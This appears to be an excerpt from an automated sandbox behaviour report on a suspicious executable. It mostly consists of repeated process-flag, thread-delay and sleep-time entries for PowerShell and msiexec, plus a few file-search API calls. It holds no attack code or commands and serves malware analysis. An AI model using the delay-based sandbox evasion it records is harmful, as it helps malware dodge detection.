            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6073Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3555Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -23058430092136925s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99891s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1372Thread sleep count: 9162 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1372Thread sleep count: 672 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99782s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99657s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99532s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99414s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -99078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98969s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -98110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97625s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97375s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97266s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97156s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -97032s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96922s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96813s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96563s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96438s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96313s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -96063s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95953s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95844s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95719s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -95110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1400Thread sleep time: -94110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004065FD FindFirstFileA,FindClose,0_2_004065FD
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_00405A2C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A2C
            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99782Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99657Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99532Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99414Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97266Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97032Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96438Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96063Jump to behavior
